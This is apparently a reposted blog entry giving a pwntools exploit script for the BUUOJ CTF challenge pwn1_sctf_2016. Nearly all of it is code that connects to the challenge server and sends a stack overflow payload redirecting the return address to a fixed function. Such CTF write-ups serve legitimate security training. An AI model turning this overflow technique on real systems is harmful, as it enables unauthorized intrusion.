其他分享
首页 > 其他分享> > CTF-Buuoj-Pwn-pwn1_sctf_2016

CTF-Buuoj-Pwn-pwn1_sctf_2016

作者:互联网

#-----------------------------------------------------------------------------------------------
# coding:UTF-8                                                                                 |
# author:zxcyyyyy000                                                                           |
# :)                                                                                           |
#-----------------------------------------------------------------------------------------------
from PwnContext import *
from pwnlib.util.packing import p32
from pwnlib.util.packing import p64
from pwnlib.util.packing import u32
from pwnlib.util.packing import u64
#-----------------------------------------------------------------------------------------------
s       = lambda data               :ctx.send(str(data))
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))
sl      = lambda data               :ctx.sendline(str(data))
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))
r       = lambda numb=4096          :ctx.recv(numb)
ru      = lambda delims, drop=False :ctx.recvuntil(delims, drop)
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
uu32    = lambda data               :u32(data.ljust(4, b'\0'))
uu64    = lambda data               :u64(data.ljust(8, b'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
irt     = lambda                    :ctx.interactive()
p       = lambda                    :pause()
#-----------------------------------------------------------------------------------------------
Debug                     = 0
file_name                 = 'pwn1_sctf_2016'
target_addr               = 'node4.buuoj.cn:27253'
libc_name                 = ''
libc_path                 = '/home/ubuntu/Tools/libc-database/libs/' + libc_name + '/'
context.log_level         = 'DEBUG'
ctx.binary                = file_name
if Debug == 0:
    elf                   = ELF(file_name)
    if(libc_name != ''):
        libc                  = ELF(libc_path+'libc.so.6')
    context.os            = elf.os
    context.arch          = elf.arch
    ctx.remote=(str((target_addr.split(':'))[0]),int((target_addr.split(':'))[1]))
    ctx.start('remote')
elif Debug == 1:
    ctx.custom_lib_dir    = libc_path
    ctx.debug_remote_libc = True
    elf                   = ELF(file_name)
    libc                  = ELF(libc_path+'libc.so.6')
    context.os            = elf.os
    context.arch          = elf.arch
    ctx.start()
elif Debug == 2:
    elf                   = ELF(file_name)
    ctx.start()
else:
    print("Error")
    exit(1)
#-----------------------------------------------------------------------------------------------
def Exploit():
    sl('I'*21+'a'+p32(0x08048F0D))
    irt()
#-----------------------------------------------------------------------------------------------
Exploit()

image

标签:pwn1,name,libc,ctx,sctf,Buuoj,elf,data,lambda
来源: https://www.cnblogs.com/zxcyyyyy000/p/16454264.html